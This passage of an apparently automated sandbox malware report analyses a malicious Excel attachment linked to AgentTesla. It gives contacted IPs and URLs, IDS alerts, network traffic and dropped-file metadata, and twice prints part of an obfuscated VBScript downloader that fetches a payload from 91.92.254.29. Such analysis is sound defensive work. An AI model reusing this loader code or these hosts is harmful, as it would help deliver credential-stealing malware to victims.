                  • URL Reputation: safe
                  unknown
                  http://ip-api.comAddInProcess32.exe, 00000008.00000002.619828282.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002400000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://192.3.216.148/base6Lpowershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.216.148/datingloverstartingAgain.vbsjEQNEDT32.EXE, 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.2168powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.473734424.0000000002251000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002400000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtwscript.exe, 00000005.00000002.476979913.0000000000657000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476718429.000000000044C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476838372.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476732830.0000000000446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476749983.000000000044D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476923222.0000000000447000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476573009.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476948649.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476926894.0000000000450000.00000004.00000020.00020000.00000000.sdmp, datingloverstartingAgain.vbs.2.dr, datingloverstartingAgain[1].vbs.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  91.92.254.29
                  unknownBulgaria
                  34368THEZONEBGtrue
                  208.95.112.1
                  ip-api.comUnited States
                  53334TUT-ASUStrue
                  192.3.216.148
                  unknownUnited States
                  36352AS-COLOCROSSINGUStrue
                  91.92.254.194
                  unknownBulgaria
                  34368THEZONEBGtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1467952
                  Start date and time:2024-07-05 06:22:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 31s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Nuevo orden.xlam.xlsx
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@8/7@1/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 94%
                  • Number of executed functions: 42
                  • Number of non-executed functions: 6
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  00:23:49API Interceptor58x Sleep call for process: EQNEDT32.EXE modified
                  00:23:52API Interceptor55x Sleep call for process: wscript.exe modified
                  00:23:53API Interceptor8x Sleep call for process: powershell.exe modified
                  00:23:57API Interceptor20x Sleep call for process: AddInProcess32.exe modified
                  InputOutput
                  URL: Office document Model: gpt-4o
                  ```json{  "riskscore": 0,  "reasons": "The provided screenshot is completely blank and does not contain any text, buttons, links, or any other elements that could be analyzed for phishing risk. Therefore, there is no evidence of any malicious content or attempts to mislead the user."}
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  91.92.254.29Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.29/Users_API/BrainiacMAX/file_xwzwa2th.hjh.txt
                  Ship particulars.xlsGet hashmaliciousUnknownBrowse
                  • 91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt
                  Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                  • 91.92.254.29/Users_API/HURRICANE/file_2n4kbwex.dbr.txt
                  Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                  • 91.92.254.29/Users_API/HURRICANE/file_2n4kbwex.dbr.txt
                  4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
                  208.95.112.1Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  main.ps1Get hashmaliciousUnknownBrowse
                  • ip-api.com/json
                  main.ps1Get hashmaliciousUnknownBrowse
                  • ip-api.com/json
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  20240704-455.exeGet hashmaliciousGuLoaderBrowse
                  • ip-api.com/line/?fields=hosting
                  McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
                  • ip-api.com/line?fields=query,country
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ip-api.comShip Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  20240704-455.exeGet hashmaliciousGuLoaderBrowse
                  • 208.95.112.1
                  McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
                  • 208.95.112.1
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  THEZONEBGodeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.132
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.29
                  DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                  • 91.92.254.194
                  THEZONEBGodeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.132
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.29
                  DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                  • 91.92.254.194
                  AS-COLOCROSSINGUSPod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 198.46.178.139
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.64.135
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.243.156
                  DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                  • 23.95.235.16
                  McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
                  • 107.173.80.187
                  3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
                  • 107.173.4.18
                  BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
                  • 107.173.4.18
                  Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                  • 107.174.145.78
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 107.173.4.18
                  Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 198.46.178.144
                  TUT-ASUSShip Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  20240704-455.exeGet hashmaliciousGuLoaderBrowse
                  • 208.95.112.1
                  McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
                  • 208.95.112.1
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3498
                  Entropy (8bit):3.751743125870898
                  Encrypted:false
                  SSDEEP:96:5M0Tx070M6K060ox0CHc9HcAHccfKHcf0r:5xM5HiHLHHfKH5
                  MD5:A89B876022B0D265CA68F48771DCE94A
                  SHA1:7D5D65BB6FFB48F888D96EB39E57911490773A45
                  SHA-256:52FBCA4CC3CBC3022B6706231C16FBC35334D08E229E9E2B147B2EAEC759DF1C
                  SHA-512:217B450B3B10E18A84C8B5F937D64903B4B12925B84F2DA256FA89B5F2229AA2637CC5B9F6585610E4479E3A3E949AA331B2B0C2489DBEBFCEE65998FFB73154
                  Malicious:true
                  Reputation:low
                  Preview:..D.i.m. .q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n.,. .K.i.G.q.c.q.N.n.h.s.B.e.s.K.m.n.x.o.L.B.Q.i.h.a.z.e.o.g.U.i.q.t.G.b.Z.u.L.U.Z.G.G.c.q.i.h.m.c.f.p.N.i.C.L.s.L.L.P.l.a.n.h.c.R.N.h.L.l.i.t.z.Z.g.K.k.e.C.x.W.L.N.O.c.W.n.K.A.b.G.t.U.p.C.i.u.c.i.q.x.L.Z.....S.e.t. .q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.B.r.
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3498
                  Entropy (8bit):3.751743125870898
                  Encrypted:false
                  SSDEEP:96:5M0Tx070M6K060ox0CHc9HcAHccfKHcf0r:5xM5HiHLHHfKH5
                  MD5:A89B876022B0D265CA68F48771DCE94A
                  SHA1:7D5D65BB6FFB48F888D96EB39E57911490773A45
                  SHA-256:52FBCA4CC3CBC3022B6706231C16FBC35334D08E229E9E2B147B2EAEC759DF1C
                  SHA-512:217B450B3B10E18A84C8B5F937D64903B4B12925B84F2DA256FA89B5F2229AA2637CC5B9F6585610E4479E3A3E949AA331B2B0C2489DBEBFCEE65998FFB73154
                  Malicious:true
                  Reputation:low
                  Preview:..D.i.m. .q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n.,. .K.i.G.q.c.q.N.n.h.s.B.e.s.K.m.n.x.o.L.B.Q.i.h.a.z.e.o.g.U.i.q.t.G.b.Z.u.L.U.Z.G.G.c.q.i.h.m.c.f.p.N.i.C.L.s.L.L.P.l.a.n.h.c.R.N.h.L.l.i.t.z.Z.g.K.k.e.C.x.W.L.N.O.c.W.n.K.A.b.G.t.U.p.C.i.u.c.i.q.x.L.Z.....S.e.t. .q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....q.U.c.q.r.q.j.U.S.f.r.b.a.f.k.g.d.q.G.C.C.l.G.j.z.G.L.Q.u.b.z.R.K.d.e.i.H.s.b.u.q.S.k.g.q.j.c.K.d.n.h.G.n.G.U.k.c.L.s.U.e.P.N.A.z.N.b.U.G.d.C.c.G.o.k.k.K.z.l.k.h.d.p.W.b.W.G.p.K.i.W.N.Q.W.K.G.t.L.i.n...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.B.r.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:false
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  File type:Microsoft Excel 2007+
                  Entropy (8bit):7.998250101698621
                  TrID:
                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                  • ZIP compressed archive (8000/1) 16.67%
                  File name:Nuevo orden.xlam.xlsx
                  File size:673'387 bytes
                  MD5:563632ea84cbb9b6c4a19223cd655c67
                  SHA1:fb0f18bd97964f8ee3dd6e1c7413c1de855e8568
                  SHA256:d8ba98fe2f2715873622ec5d987ac06da81077ad593d045b925007680d625025
                  SHA512:ff4edfdc41005253733591ec0dd57df6a2f530056fe307bb5df60fcc9a3bab712793be9ccd8a8789920724067456dcc99e5bf2f20dc759533ddce9bf82c696f1
                  SSDEEP:12288:Zf0Gr/fH4zOvLIpOnUxYBukaocF44Cg0LveSNS9DPgo/gG36:ZR3YzOv+sUCzcW1g0LvxNS9DoPGK
                  TLSH:D9E4238E5C518482CECDF33DAAD15629913DEAE0E7C805169E3B6C7D36D85913B2C70B
                  File Content Preview:PK...........X........?.......[Content_Types].xmlUT...0..f0..f0..f..MO.0...+...|E..Z.X..........{...K....~.)p@...K.x.}..x...*.f..]..8...@4..8....M{*.$...)B'.........:.6....9Q>S....F.2D....M.Yf*k..3P'..oeR$..R....+.....z...J.x...&..:.s..h..ZF.....$+.....G.
                  Icon Hash:2562ab89a7b7bfbf
                  Document Type:OpenXML
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:False
                  Author:USER
                  Last Saved By:USER
                  Create Time:2023-08-03T11:34:29Z
                  Last Saved Time:2023-08-03T11:37:28Z
                  Creating Application:Microsoft Excel
                  Security:0
                  Thumbnail Scaling Desired:false
                  Company:
                  Contains Dirty Links:false
                  Shared Document:false
                  Changed Hyperlinks:false
                  Application Version:16.0300
                  General
                  Stream Path:\x1oLe10Native
                  CLSID:
                  File Type:data
                  Stream Size:914065
                  Entropy:5.982328738330371
                  Base64 Encoded:False
                  Data ASCII:. V . . . ! . . : . 8 M . . . . . w . % F 0 0 Q . I . G ! K J j @ . 5 . . . O K x _ . . . . ` . . . Y ` 4 z o ' . l > b i 6 . ^ h . H . . , s G T . X 4 X . . . _ Y n . . s q . . V . d g H . d 5 t 9 2 y 7 [ s H . M . 2 A . . / . [ . 6 G e . 4 g u . . + 0 . . s 6 ^ . . I @ . . E $ . ~ . A . _ y Y 5 W . W L . 8 J . N ] . / f . { . r " i o r t K $ J . < ` . e M ? . + 5 < B J M h f X 6 J . . R 0 . [ . B @ . ' . ( d J . C . 6 C \\ . . . . 0 e # . ( ` ' O 2 | , r $ y F / e X / ? . . . . . . C . . . x . . . - . . .
                  Data Raw:16 56 0a 05 03 91 21 96 93 a5 01 08 3a e4 b8 a1 38 4d 07 05 9b 84 f8 f8 8b 10 8b 0a b8 bc 7f 77 0d 25 f3 e7 46 30 8b 30 51 ff d6 83 c0 49 ff e0 e5 9c 94 47 21 4b 4a c4 6a f9 84 bf 40 00 f7 35 c4 b2 d7 03 09 b4 4f b6 ea 4b 78 c5 e3 e9 5f 01 00 00 fb d2 ce 11 9a 60 0a 0f 15 c0 59 60 da 34 7a 6f d2 de c8 27 93 0a 6c 3e ab 62 a7 69 df 36 08 a3 5e b9 bd 68 17 48 bb fb e2 9a 15 a3 d6 12
                  General
                  Stream Path:2FCiTy3JVbJT
                  CLSID:
                  File Type:empty
                  Stream Size:0
                  Entropy:0.0
                  Base64 Encoded:False
                  Data ASCII:
                  Data Raw:
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/05/24-06:23:57.231420TCP2047750ET TROJAN Base64 Encoded MZ In Image804916391.92.254.194192.168.2.22
                  07/05/24-06:23:57.231420TCP2018856ET TROJAN Windows executable base64 encoded804916391.92.254.194192.168.2.22
                  07/05/24-06:23:57.232549TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804916391.92.254.194192.168.2.22
                  07/05/24-06:23:54.876628TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804916291.92.254.29192.168.2.22
                  07/05/24-06:23:58.201410TCP2020425ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M18049164192.3.216.148192.168.2.22
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 5, 2024 06:23:53.149600983 CEST4916180192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:53.154495955 CEST8049161192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:53.154566050 CEST4916180192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:53.154741049 CEST4916180192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:53.159502983 CEST8049161192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:53.745280027 CEST8049161192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:53.745352983 CEST4916180192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:54.226769924 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:23:54.231678009 CEST804916291.92.254.29192.168.2.22
                  Jul 5, 2024 06:23:54.231750965 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:23:54.234648943 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:23:54.240029097 CEST804916291.92.254.29192.168.2.22
                  Jul 5, 2024 06:23:54.638618946 CEST4916180192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:54.876627922 CEST804916291.92.254.29192.168.2.22
                  Jul 5, 2024 06:23:54.876672983 CEST804916291.92.254.29192.168.2.22
                  Jul 5, 2024 06:23:54.876723051 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:23:55.946233988 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:55.951586962 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:55.951781988 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:55.952363014 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:55.957823992 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579201937 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579233885 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579250097 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579268932 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579286098 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.579323053 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:56.579490900 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:56.658632994 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658653021 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658665895 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658677101 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658689022 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658700943 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658713102 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658714056 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:56.658721924 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.658735991 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:56.658762932 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:56.670844078 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.670948982 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.670960903 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 06:23:56.671010971 CEST4916380192.168.2.2291.92.254.194
